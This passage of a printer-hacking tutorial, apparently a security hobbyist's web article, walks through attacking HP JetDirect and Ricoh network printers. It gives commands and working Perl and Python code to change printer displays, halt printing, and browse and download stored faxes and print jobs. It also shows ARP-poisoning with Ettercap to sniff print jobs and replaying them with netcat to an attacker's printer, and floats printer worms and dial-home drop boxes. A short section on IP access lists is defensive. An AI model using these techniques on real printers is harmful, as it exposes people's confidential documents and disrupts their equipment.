of the JetDirect box that services the printer. You can do this in
one of at least three ways. The first way is by hitting the little test
button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through
the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxes" settings, right click
and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******).
Once you have this information it's easy to run Silicosis' little hack.
To run it from Windows just use the following syntax: hpnt Hostname Message
Windows Example:
C:\>hpnt npi769e71 "Irongeek"
HP Display hack -- [email protected]: npi769e71
Message: Irongeek
Connecting....
Sent 54 bytes

C:\>hpnt 192.168.1.14 "Irongeek Also"
HP Display hack -- [email protected]: 192.168.1.14
Message: Irongeek Also
Connecting....
Sent 59 bytes

C:\>
If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc.
The syntax is the same as the Windows version. Below is an example of how to compile and run it:
[root@balrog root]# gcc -o hphack hp.c
hp.c:28:12: warning: multi-line string literals are deprecated
[root@balrog root]# ./hphack 192.168.1.14 "Irongeek"
HP Display hack -- [email protected]: 192.168.1.14
Message: Irongeek
Connecting....
Sent 54 bytes
[root@balrog root]#
A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can
download Silicosis hack from one of these links:
Unix Source
Windows Source
Windows Binary
I'm working on my own GUI version with extra features; its web page can be found here:
http://www.irongeek.com/i.php?page=security/jetdirecthack
Unfortunately it's pretty buggy.
The easiest tool to use may be Hijetter by FtR of Phenoelit, which is covered in the next section.
Phenoelit's Hijetter and PFT
Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL
commands, and works even if a password is set (at least on my HP JetDirect 300X). You can download the binary
and the source code for this app from:
http://www.phenoelit.de/hp/download.html
Below is a screenshot of Hijetter's interface. To use Hijetter just type in the IP or host name of your JetDirect
box and click the connect icon.
You should notice that a few of the icons at the bottom of the interface light up.
You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the
JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that
displays on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.
Setting the LCD Display with Hijetter
1. After you have connected to the JetDirect box click the LCD Display icon.
2. Type in the message you want the printer's LCD to display.
3. If you check the "Failure" radio button the printer will stop printing until someone hits the ok/continue/online button on the printer, or it's reset.
4. Click the confirm button and your message should now appear on the printer's LCD.
Changing settings with Hijetter
1. After you have connected to the JetDirect box click the settings icon.
2. Find the environmental variable you want to change and type in the value you want to set it to, keeping in mind the limitations listed in the "Info" panel.
3. Use the assign button to set your change. An M should appear next to the variable you changed.
4. Click the confirm button and you're done.
Using Hijetter to treat some JetDirect boxes as files/web servers
1. After you have connected to the JetDirect box click the File System icon.
2. Use the arrows to transfer files to and from your client to the JetDirect box. Keep in mind that you can only transfer one file at a time with Hijetter.
3. The New Folder and Delete icons can be used for their obvious functions.
4. Click the confirm button and you're done.
Finding stored faxes and print jobs on Jetdirect printers
Look around the file system and download any files that look interesting. Most of them don't have obvious file
extensions so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few
of the things I've found by searching around this way:
Location                      What I've found
/saveDevice/DigitalSend/jobs  Jpegs with names like DS000848.005 that seem to be either print jobs or faxes.
/FaxOut                       Tif files from sent faxes.
/FaxIn                        PCL files from received faxes. See my NetCat and FTP tricks later for more information on how to print them.
/Fax/act.log                  Seems to be a log of phone numbers where things have been faxed to or from. Could be useful for social engineering.
Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes
for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:
/webserver/home/
and can be accessed from the printers web interface at:
http://192.168.1.4/hp/device/
For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed
from the web with the URL:
http://192.168.1.4/hp/device/naughtylinuxgirls.avi
Feel free to put your homepage on a printer. :)
If you're a *nix or Windows command line boy, don't despair. The same folks from Phenoelit have provided PFT,
a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these
commands:
mkdir pjllib
cd pjllib
wget http://www.phenoelit.de/hp/libPJL-1.3-src.tgz
tar -xzf libPJL-1.3-src.tgz
make
cd pft/
make
Here is an example of what it looks like on the command line after you bring up the help page; look at all of the
options:
Irongeek:/home/adrian/pjllib/pft# ./pftPFT - PJL file transfer
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
25 of 37 02/04/2009 08:17
FX of Phenoelit <[email protected]>Version 0.7 ($Revision: 1.8 $)
pft> helphelp <command>quitserver [hostname]port [port number]connectcloseenv {read|print|show|set|options|changed|commit|unprotect|bruteforce}message "Display Msg"failure "Failure Msg"volumeschvol [vol:]pwdlscd [directory]mkdir [directory]rm [file]get [file]put [local file]append [local file] [file]lpwdlcd [directory]sessiontimeout [timeout]pausepft>
PFT also has some limited scripting ability by piping in commands from a text file as this example shows:
Irongeek:/home/adrian/pjllib/pft# cat mypftscript.txt
server 192.168.31.213
connect
ls
quit
Irongeek:/home/adrian/pjllib/pft# ./pft < mypftscript.txt
PFT - PJL file transfer
FX of Phenoelit <[email protected]>
Version 0.7 ($Revision: 1.8 $)
pft> Server set to 192.168.31.213
pft> Connected to 192.168.31.213:9100
Device: HP LaserJet 4100 MFP
pft> 0:\
.            -  d
..           -  d
PermStore    -  d
PostScript   -  d
PJL          -  d
saveDevice   -  d
cpbLog    5227  -
Fax          -  d
solution     -  d
webServer    -  d
FaxOut       -  d
FaxIn        -  d
pft>
Irongeek:/home/adrian/pjllib/pft#
Since Phenoelit provides the source code it could be an interesting project to write new automated tools for
extracting information from remote JetDirect boxes.
Using IP ACLs to restrict access
One of the few ways that HP gives you to lock down a printer is IP ACLs (Access Control Lists). Other network
printer manufacturers offer similar functionality. While the syntax may differ a little from JetDirect to JetDirect, the
basics are the same. On newer JetDirects you can use the web interface to restrict what IPs can connect to the printer
(normally you just want the CUPS or Windows print server to connect), but on almost all of them you can use the
Telnet interface to restrict what IPs can connect. This log should give you an idea of how the "acl allow: ip"
command is used:
Irongeek@Irongeek:~# telnet 192.168.1.22
Trying 192.168.1.22...
Connected to 192.168.1.22.
Escape character is '^]'.
HP JetDirect
Password:pass
You are logged in
Please type "?" for HELP, or "/" for current settings
> allow:0
> quit
===JetDirect Parameters Configured===
IP Address : 192.168.1.22
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : butt
Host Name : NPI6D47B6
Default Get Cmnty : Disabled
DHCP Config : Disabled
Passwd : Enabled
IPX/SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host.
Irongeek@Irongeek:~# telnet 192.168.33.22
Trying 192.168.33.22...
Connected to 192.168.33.22.
Escape character is '^]'.
HP JetDirect
Password:pass
You are logged in
Please type "?" for HELP, or "/" for current settings
> allow:192.168.19.56
> allow:192.168.20.0 255.255.255.0
> allow:list
Access Control List:
IP: 192.168.19.56 Mask: 255.255.255.255
IP: 192.168.20.0 Mask: 255.255.255.0
> quit
===JetDirect Parameters Configured===
IP Address : 192.168.33.22
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : butt
Host Name : NPI6D47B6
Default Get Cmnty : Disabled
DHCP Config : Disabled
Passwd : Enabled
IPX/SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host.
Irongeek@Irongeek:~#
Notice that if we now try to attach or port scan the JetDirect from an unauthorized host no connections can be
made to any of the ports:
root@ScanBox:~# nmap -A 192.168.1.22
Starting Nmap 4.00 ( http://www.insecure.org/nmap/ ) at 2006-03-16 21:30 EST
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
All 1672 scanned ports on 192.168.1.22 are: closed
MAC Address: 00:60:B0:6D:47:B6 (Hewlett-packard CO.)
Device type: general purpose|VoIP phone|broadband router|printer|printserver|scanner|specialized|telecom-misc
Running: Alpha Micro AMOS, Clipcomm embedded, D-Link embedded, DEC TOPS-20, HP embedded, Liebert embedded, Nortel embedded, SMC embedded
Too many fingerprints match this host to give specific OS details
Nmap finished: 1 IP address (1 host up) scanned in 16.921 seconds
root@ScanBox:~#
It's generally a good idea to set up this kind of IP restriction as it can stop some forms of attack (though not
sniffing of print jobs using ARP poisoning).
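When you audit a fleet of JetDirects it helps to check the "allow:list" output against the hosts that actually should be printing. The following is an added example (not from the original article) that parses the listing shown above, using the same "host & mask == ip & mask" rule the JetDirect applies, and flags any entry broader than a single host; the sample listing is constructed from the session above.

```python
import ipaddress

# Constructed sample in the form the JetDirect "allow:list" command prints.
SAMPLE_ACL_LISTING = """Access Control List:
IP: 192.168.19.56 Mask: 255.255.255.255
IP: 192.168.20.0 Mask: 255.255.255.0
"""


def parse_acl_listing(listing: str) -> list:
    """Turn the 'IP: x Mask: y' lines of an allow:list dump into ip_network objects."""
    networks = []
    for line in listing.splitlines():
        line = line.strip()
        if not line.startswith("IP:"):
            continue
        parts = line.split()
        # parts looks like ['IP:', '192.168.19.56', 'Mask:', '255.255.255.255']
        ip, mask = parts[1], parts[3]
        # strict=False so an entry with host bits set under the mask is still accepted
        networks.append(ipaddress.ip_network(f"{ip}/{mask}", strict=False))
    return networks


def host_allowed(host: str, networks: list) -> bool:
    """A host matches an entry when (host & mask) == (ip & mask), i.e. it lies in the network."""
    addr = ipaddress.ip_address(host)
    return any(addr in net for net in networks)


def audit_allow_list(listing: str, expected_hosts: list) -> dict:
    """Report which expected print servers get through and which entries are wider than one host."""
    networks = parse_acl_listing(listing)
    return {
        "allowed": {h: host_allowed(h, networks) for h in expected_hosts},
        "broad_entries": [str(n) for n in networks if n.prefixlen < 32],
    }


if __name__ == "__main__":
    # The second entry lets a whole /24 in, which is worth a second look.
    print(audit_allow_list(SAMPLE_ACL_LISTING, ["192.168.19.56", "192.168.19.57"]))
```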
Don't forget to look for Stored Documents via the web interface
I'm mostly putting this here because of the Ricoh Savins I've played with, but it's good advice for HP printers
too. Look for Stored Documents via the web interface on the printers you find; many times users will save print jobs
and faxes where they can be accessed from the web without even realizing it. I've found quite a few things this way in
the past while performing audits.
Coding your own scripts with PHP, Perl and PJL
I thought some of you might be interested in writing your own scripts to change the printer display, or other tasks
involving PJL. First, read some of the PJL references linked in the reference section, then play around with telnetting
in and issuing the PJL commands directly. You will notice that there are quite a few that can be used to query the
status of the printer:
Irongeek:~# telnet 192.168.1.33 9100
Trying 192.168.1.33...
Connected to 192.168.1.33.
Escape character is '^]'.
@PJL INFO ID
@PJL INFO ID
"LASERJET 4000"
@PJL INFO STATUS
@PJL INFO STATUS
CODE=10001
DISPLAY="Ready"
ONLINE=TRUE
@PJL INFO PAGECOUNT
@PJL INFO PAGECOUNT
536225
@PJL INFO MEMORY
@PJL INFO MEMORY
TOTAL=2526160
LARGEST=1204208
^]
telnet> quit
Connection closed.
Irongeek:~#
I decided to use Perl for my examples since it's easy to use, multiplatform and pretty easy to do sockets with. Most
*nix systems should have Perl already; if you use Windows, download and install ActiveState's ActivePerl from here:
http://www.activestate.com/Products/ActivePerl/
Another useful resource is the "Printer Job Language Technical Reference Manual" which can be found at:
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
read it and learn what can be done with PJL. Here are two links that may help you understand Perl and Socket
programming:
http://www.perlfect.com/articles/sockets.shtml
http://www.rocketaware.com/perl/perlipc/TCP_Clients_with_IO_Socket.htm
Here are a few quick Perl scripts. This first one just lets you set the LCD display on a JetDirect enabled HP
Printer:
#!/usr/bin/perl -w
#File name: lcd.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to set LCD Display an HP JetDirect printer
#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"
use strict;
use IO::Socket;
my $ip = $ARGV[0];
my $lcdtext = $ARGV[1];
die "Syntax: $0 <ip-of-jetdirect> \"Some Message\"\n" unless defined $ip and defined $lcdtext;
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
# UEL (ESC %-12345X) to drop into PJL, then the ready-message command
print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";
# Trailing UEL to close out the PJL job
print $sock "\e%-12345X\n";
close($sock);
Sometimes the above version does not work, so try:
#!/usr/bin/perl -w
#File name: lcd.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to set LCD Display an HP JetDirect printer
#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"
use strict;
use IO::Socket;
my $ip = $ARGV[0];
my $lcdtext = $ARGV[1];
die "Syntax: $0 <ip-of-jetdirect> \"Some Message\"\n" unless defined $ip and defined $lcdtext;
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
# Same command as above, but without the UEL sequence
print $sock "\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";
close($sock);
It would seem that sometimes the escape character (27 dec, 1B hex, 033 oct) and "%-12345X" is needed and
sometimes it's not. It appears from my reading that it's only needed for UEL (Universal Exit Language) commands. I'd
like more details on when it has to be used and when it does not, email me if you know.
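The INFO queries from the telnet session above and the UEL question are easier to reason about with the bytes laid out explicitly. Here is an added example (mine, not the article's code) that builds a PJL command with or without the UEL prefix and parses the reply into a dictionary; the sample replies are constructed to match the session shown earlier, and the form-feed terminator on INFO replies and the trailing UEL sent after the query are my assumptions about the device's behaviour.

```python
import socket

UEL = b"\x1b%-12345X"  # Universal Exit Language: ESC % - 1 2 3 4 5 X (27 dec / 1B hex)


def pjl_command(cmd: str, uel: bool = True) -> bytes:
    """Build the bytes for one PJL command, optionally prefixed with UEL.

    The UEL prefix is what takes the printer out of PCL/PostScript and into
    PJL before the command is read; PJL lines end in a line feed.
    """
    body = b"@PJL " + cmd.encode("ascii") + b"\r\n"
    return UEL + body if uel else body


def parse_pjl_info(response: bytes) -> dict:
    """Parse the reply to '@PJL INFO <category>' into a dict.

    The reply echoes the command on its first line, then one KEY=VALUE (or a
    bare quoted value) per line; assumed here to end with a form feed (0x0C).
    """
    text = response.decode("ascii", errors="replace").split("\x0c", 1)[0]
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    result = {}
    if lines and lines[0].startswith("@PJL INFO"):
        result["_category"] = lines[0].split()[-1]
        lines = lines[1:]
    for ln in lines:
        key, sep, value = ln.partition("=")
        if sep:
            result[key.strip()] = value.strip().strip('"')
        else:
            result.setdefault("_values", []).append(ln.strip('"'))
    return result


def query_printer(host: str, category: str, port: int = 9100, timeout: float = 5.0) -> dict:
    """Send one INFO query over AppSocket (port 9100/tcp) and parse the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        # Trailing UEL closes the PJL job so the printer goes back to Ready
        sock.sendall(pjl_command(f"INFO {category}") + UEL)
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
            if b"\x0c" in data:  # assumed end-of-reply marker
                break
    return parse_pjl_info(b"".join(chunks))


# Constructed sample replies matching the telnet session above (not live captures).
SAMPLE_STATUS = b'@PJL INFO STATUS\r\nCODE=10001\r\nDISPLAY="Ready"\r\nONLINE=TRUE\r\n\x0c'
SAMPLE_ID = b'@PJL INFO ID\r\n"LASERJET 4000"\r\n\x0c'

if __name__ == "__main__":
    print(parse_pjl_info(SAMPLE_STATUS))
    print(parse_pjl_info(SAMPLE_ID))
```

Run query_printer("<printer-ip>", "STATUS") against a printer you administer to see the same keys come back live.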
This script just sends a simple line of text to the printer directly:
#!/usr/bin/perl -w
#File name: print.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to send a simple line of text to a HP JetDirect printer
#Syntax: ./print.pjl.pl <ip-of-jetdirect> "Some Text To Print"
use strict;
use IO::Socket;
my $ip = $ARGV[0];
my $texttoprint = $ARGV[1];
die "Syntax: $0 <ip-of-jetdirect> \"Some Text To Print\"\n" unless defined $ip and defined $texttoprint;
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
# Whatever is written to port 9100 goes straight to the printer
print $sock $texttoprint;
close($sock);
This one does a countdown on the LCD screen, then ends with a bang:
#!/usr/bin/perl -w
#File name: selfdestructlcd.pjl.pl
#From http://www.Irongeek.com [email protected]
#Script to send a count down to the printers LCD, ending in a Bang.
#Syntax: ./selfdestructlcd.pjl.pl <ip-of-jetdirect>
use strict;
use IO::Socket;
my $ip = $ARGV[0];
die "Syntax: $0 <ip-of-jetdirect>\n" unless defined $ip;
my $sock = new IO::Socket::INET (
    PeerAddr => $ip,
    PeerPort => '9100',
    Proto    => 'tcp',
);
die "Could not create socket, Monkey boy! $!\n" unless $sock;
for (my $i = 30; $i >= 0; $i--) {
    print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n";
    # Echo the same command to the terminal so you can follow along
    print "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n";
    sleep 1;
}
print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Bang!!!\"\n";
sleep 5;
# Put the display back to normal and close out the PJL job
print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Ready\"\n";
print $sock "\e%-12345X\n";
close($sock);
I know some of you want the script that lets you make a printer web cam like the one I had up for a short
while. You can download the PHP source code here:
http://irongeek.com/downloads/printeraction.txt
If you write any interesting scripts send them to me and I'll post them with your credits. Happy scripting!
Fixing a busted hard drive with Ghost
Matthew Hinton (info [at] fireshadow.net) sent me some details on fixing a broken hard drive in an HP 4100
MFP with Ghost, which could be useful to quite a few of you if your printer is out of warranty:
Don't know if you'd be interested in the details for your page or not.
Where I work at we've been able to make a ghost image of the 4100 MFP hard
drive load. This allows us to put it on new hard drives to reinstall in
the EIO slot. What drove us to this insanity is as follows.
We have about 10 or so of the 4100 MFP's here. After the warranty
expired, they started getting the same error - "49.FF81 error" on the
display. Pretty much it's a new EIO hard disk. HP has a procedure that
may or may not work to reset it. $49 to talk to a tech over the phone
since it's out of warranty. $345 for a new EIO disk from HP. Local guy
wants $515 to come out with a new disk to fix it.
Taking apart the bad one, we noticed that it's a standard Toshiba 20 Gb
laptop hard drive. The PC tech went and got a known good EIO hard disk,
and we made a ghost image of it. We tried sending the ghost image back
over to the bad drive, but got a "drive too small error". The ghost image
took fine on a Seagate 40 Gb notebook drive. Put the Seagate drive on
the controller card, reinstalled and it's working fine.
Anyway, thanks for putting up the informative page. I'm using Hijetter
right now to look at the variables on the printer.
Sincerely,
Matthew Hinton
Sniffing print jobs and replaying them
How often do folks print things and think that as long as no one gets hold of the hard copy there's no security risk? As
it turns out, sniffing print jobs is pretty easy if you can get on the same LAN segment as the printer or print server.
Since the print jobs are not encrypted, sniffing and reprinting them to your own printer is comparatively a breeze if
you know how. This example shows how to sniff between a Windows 2003 based print server and a JetDirect or Ricoh
Savin based network printer that uses AppSocket (port 9100/tcp) for communications, but the principles should apply
to other setups as well.
1. First we have to pull off a MitM (Man in the Middle) attack by ARP poisoning the JetDirect box and the Windows
print server and saving the packets to a Pcap file. I'll use Ettercap on a Linux box to do this, but other apps may work
as well. To pull it off I will use the following Ettercap command:
ettercap -T -q -w print.dump -M ARP /192.168.1.2/ //
where 192.168.1.2 is the IP of my network printer. Note that this will cover all of your bases, but can cause one hell
of an ARP storm since Ettercap has to ARP poison every host on the subnet. In some cases it might be better (and
faster) to just ARP poison between two hosts you know the traffic will be going through. Here is an example:
ettercap -T -q -w print.dump -M ARP /192.168.1.2/ /192.168.22.47/
where 192.168.1.2 is the IP of the network printer and 192.168.22.47 is the IP of the Windows/*nix print server or PC
sending the print job. Hit the "q" key at any time to stop the ARP poisoning and sniffing.
2. Now that we have our Pcap (also sometimes called a libpcap or tcpdump file) we have to open it up in Ethereal.
Just use the File->Open menu and point it to the print.dump file made by Ettercap.
3. Once print.dump has been opened in Ethereal we need to filter it. Enter the following filter and hit Apply:
tcp.flags.syn == 1 && tcp.dstport == 9100
4. As you see from the screen shot above, the filter got rid of a lot of the extraneous data. These four packets
represent two print jobs, or at least the beginnings of them. Packets number 158 and 159 are part of the same
print job. Packets number 510 and 511 are part of the 2nd print job. What we want to do now is right click every
other packet, starting with the first, and choose "Follow TCP Stream".
5. Once you have chosen "Follow TCP Stream" you should see a window something like the one above. Set the drop
down box to only show the traffic destined to the network printer as shown above. Set the data type to RAW and
then click the "Save As" button and call the output file something like "test1.job".
6. Repeat steps 4 and 5 for every other packet to get all of the print jobs captured.
7. At this point we could open up "test1.job" in a text editor, and if it's a PostScript file, remove every line before:
%!PS-Adobe-3.0
and after:
%%EOF
to create a .PS file (PostScript) that could be opened up in GhostView on a *nix box. You might be able to do
something similar with a PCL based print job, but I have not figured out what parts to remove yet. As it stands we can
leave "test1.job" as it is, whether it's PCL or PostScript, and send it to the printer by replaying it with NetCat to a
network printer we control. The command is quite simple:
cat test1.job|netcat -q 0 192.168.1.2 9100
where "test1.job" is the sniffed print job we want to replay and 192.168.1.2 is a network printer that we control. If the
Netcat command seems too complex you could also just use an FTP client and FTP the captured print jobs to a
JetDirect enabled printer (assuming FTP is enabled on the JetDirect box).
All this seems a bit complicated I know, so I'm thinking of asking the Cain team to add this functionality to their
app to make it easier.
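Step 7 above is just a byte-level carve, and doing it in code makes the point for the auditor: anything crossing port 9100 in the clear can be pulled apart offline. This is an added example of mine, not the article's code, that classifies a captured job by its PJL header and carves the PostScript between "%!PS-Adobe" and "%%EOF"; the sample jobs are constructed, and the PCL detection via the ESC E reset sequence is my assumption.

```python
from typing import List, Optional

UEL = b"\x1b%-12345X"  # Universal Exit Language wrapper around PJL-controlled jobs
PS_HEADER = b"%!PS-Adobe"
PS_TRAILER = b"%%EOF"


def pjl_header(job: bytes) -> List[str]:
    """Return the @PJL lines that precede the page data (empty list if none)."""
    body = job[len(UEL):] if job.startswith(UEL) else job
    header = []
    for line in body.split(b"\n"):
        line = line.rstrip(b"\r")
        if not line.startswith(b"@PJL"):
            break
        header.append(line.decode("ascii", errors="replace"))
    return header


def classify_job(job: bytes) -> str:
    """Guess the page description language of a captured AppSocket stream."""
    if PS_HEADER in job:
        return "postscript"
    for line in pjl_header(job):
        # e.g. '@PJL ENTER LANGUAGE=PCL' tells us what follows the header
        if line.upper().startswith("@PJL ENTER LANGUAGE"):
            return line.split("=", 1)[1].strip().lower()
    if b"\x1bE" in job:  # PCL printer-reset sequence (assumed heuristic)
        return "pcl"
    return "unknown"


def extract_postscript(job: bytes) -> Optional[bytes]:
    """Carve the PostScript document out of a capture, as step 7 does by hand.

    Returns None when there is no PostScript header or when the capture was
    cut off before the %%EOF trailer (a partial job is not worth replaying).
    """
    start = job.find(PS_HEADER)
    if start == -1:
        return None
    end = job.find(PS_TRAILER, start)
    if end == -1:
        return None
    end += len(PS_TRAILER)
    nl = job.find(b"\n", end)  # keep the trailer's own line ending if present
    return job[start:nl + 1] if nl != -1 else job[start:end]


# Constructed sample captures (not real sniffed jobs).
SAMPLE_PS_JOB = (
    UEL + b"@PJL SET COPIES=1\r\n@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
    + b"%!PS-Adobe-3.0\n%%Title: memo.doc\n/Helvetica findfont 12 scalefont setfont\n"
    + b"72 720 moveto (Internal only) show showpage\n%%EOF\n" + UEL
)
SAMPLE_PCL_JOB = UEL + b"@PJL ENTER LANGUAGE=PCL\r\n\x1bE\x1b&l1Xsome text\x1bE" + UEL

if __name__ == "__main__":
    for job in (SAMPLE_PS_JOB, SAMPLE_PCL_JOB):
        print(classify_job(job), pjl_header(job))
    print(extract_postscript(SAMPLE_PS_JOB).decode())
```

Pointing extract_postscript at the bytes of "test1.job" gives you the .ps file that step 7 describes making in a text editor.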
A note on Plain-text authentication protocols
Many of the above attacks are only possible because people don't enable passwords on their network printers.
However, even if passwords are enabled they could still be sniffed pretty easily since most network printers use
simple telnet or a web interface without SSL to configure the system. Both telnet and HTTP (without SSL) passwords
can easily be sniffed with packages like Ettercap, Cain or Dsniff. Some newer network printers, such as the HP
Jetdirect en3700 (J7942A), can use SSL with their web interface (albeit with a self-signed certificate) and the
interface seems to be more than just a Java applet for using SNMP to control the Jetdirect. This is a much more secure
option than the older Jetdirects that used unencrypted HTTP and SNMP v1/v2.
Other Ideas
There's still a lot more out there I need to research and play with when it comes to hacking network printers. As
with most of my projects this is a work in progress so feel free to email me your ideas. A few interesting topics might
be:
Using Phenoelit's ChaiServices information to create worms, backdoors and other malware for HP
JetDirect printers.
Modifying the PFT source code to make automated apps for searching an IP space and pulling files off of
the network printers.
Vulnerabilities in network printer implementation like buffer overflows and such.
Hacking the firmware in JetDirects to create dial home (shell shoveling) drop boxes that could be left
behind on target networks to help with intrusions. For those wanting to help install the HP Download Manager
and look in "C:\Program Files\Hewlett-Packard\HP Download Manager\Upgrades\jetdirect" for the vendor
firmwares.
Tracking Dots: http://www.eff.org/Privacy/printers/list.php
Also don't forget to check out SecurityFocus' online vulnerabilities database (http://www.securityfocus.com/) to
see if your particular network printers have any outstanding issues. I know they have a few issues listed for some of
the JetDirect boxes. While you're at it, check for vulnerabilities in the base OS that the network printer uses,
VxWorks in the case of some JetDirects and NetBSD for the Ricoh Savins.
I hope you have found this article interesting. If you have any ideas or comments please feel free to e-mail me.
Happy printer hacking.
Links to Tools:
HP Web JetAdmin (without registering)
http://www.svrops.com/svrops/dwnldprog.htm
HP JetAdmin for Windows 2000 3.42, the last version to be released
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
HP Download Manager (for upgrading firmware)
http://www.hp.com/go/dlm_sw
Ghostscript, Ghostview and GSview
http://www.cs.wisc.edu/~ghost/
SmartDeviceMonitor
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone's SNScan (find network printers that use SNMP, which seems to be most of them)
http://www.foundstone.com/resources/proddesc/snscan.htm
SoftPerfect's NetScan (also useful for scanning for SNMP services)
http://www.softperfect.com/products/networkscanner/
Silicosis' HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/hphack
Irongeek's GUI HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/jetdirecthack
IPIterator
http://www.irongeek.com/i.php?page=security/ipiterator
Hijetter
http://www.phenoelit.de/hp/download.html
Ettercap
http://ettercap.sourceforge.net/
Ethereal
http://www.ethereal.com/
NetCat
http://netcat.sourceforge.net/
Net-SNMP
http://net-snmp.sourceforge.net/
Media:
Here's a collection of videos and other media on Network Printer Hacking you might be interested in:
Network Printer Hacking: Irongeek's Presentation at Notacon 2006
http://irongeek.com/i.php?page=videos/notacon2006printerhacking
Slides and other resources from the above presentation
http://irongeek.com/downloads/notacon2006.zip
Infonomicon TV Ep 7
http://irongeek.com/i.php?page=videos/infonomicontv7
Useful links for further research:
Common print server port numbers
http://members.cruzio.com/~jeffl/sco/lp/printservers.htm
HP's guide to securing JetDirect printers
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999
Understanding, Reversing, and Hacking HP Printers by Slobotron
http://www.searchlores.org/realicra/hp_slobo.htm
SecurityFocus' online vulnerabilities database
http://www.securityfocus.com/
Network Printers and Other Peripherals -- Vulnerabilities and Fixes by Dennis Mattison (Littlew0lf)
http://members.cox.net/ltlw0lf/printers/index.html
older version: http://freshmeat.net/articles/view/445/
Securing Network Print Jobs - An LRS White Paper
http://www.lrs.com/EOM/Solutions/Papers/secure.aspx
Printer Job Language Technical Reference Manual
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
Printers, Proxies and Pranksters An April Fool's Recipe for Fun by Kellegous
http://web.kellegous.com/scratch/2003/printers1KBXB/
RICOH Aficio 2035 "security'' by mslaviero
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Special thanks to Nancy for proof reading and making my English intelligible.
Change Log
02/06/2007: I've updated info on the fix for the Pharos cached print job vulnerability
01/20/2007: HP seems to have released a fix for the FTP DoS problem. See the Printer DoSing section.
01/10/2007: Fixed and added some links in the Printer DoSing section.
01/06/2007: Add information on the Joxean Koret attack to the Printer DoSing section.
04/18/2006: Added link to a newer version of Littlew0lf's article.
04/10/2006: Added Media section.
04/02/2006: Added a bunch of information for my presentation at Notacon 2006
Added section: Stupid Printer Tricks
Added section: Finding info about the printer using SNMP tools.
Added section: Finding Printers with Google.
Added section: RSH commands and Ricoh Savin Aficio Printers.
Added section: Spamming Printers.
Added section: Getting a JetDirect password remotely using the SNMP vulnerability
Added information about SSL with newer Jetdirects to A note on Plain-text authentication protocols and
JetDirect password notes sections.
Added information on SmartDeviceMonitor to Finding Network printers using Nmap and SNMP tools
and Finding info about the printer using SNMP tools as well as adding screenshot of the SNMP tools
mentioned. I also added some details on finding network printers via their MAC address.
Added information on holding a connection to port 9100/tcp to DoSing the network or the printer.
Added information on IPX/AppleTalk/SMB to Intro to the concepts.
Added alternate Perl script and added PHP web form to Coding your own scripts with PHP, Perl and
PJL.
Added HP firmware location to Other Ideas.
01/18/2006: Added section on Fixing a busted hard drive with Ghost.
09/14/2005: Found another missing image, the LCD Display icon from Hijetter. It's fixed now. I also added a link
suggested by Dick from Hack A Day.
09/14/2005: Hack A Day added a link to this site and I noticed that the Hijetter file system image was broken. It
should be fixed now.
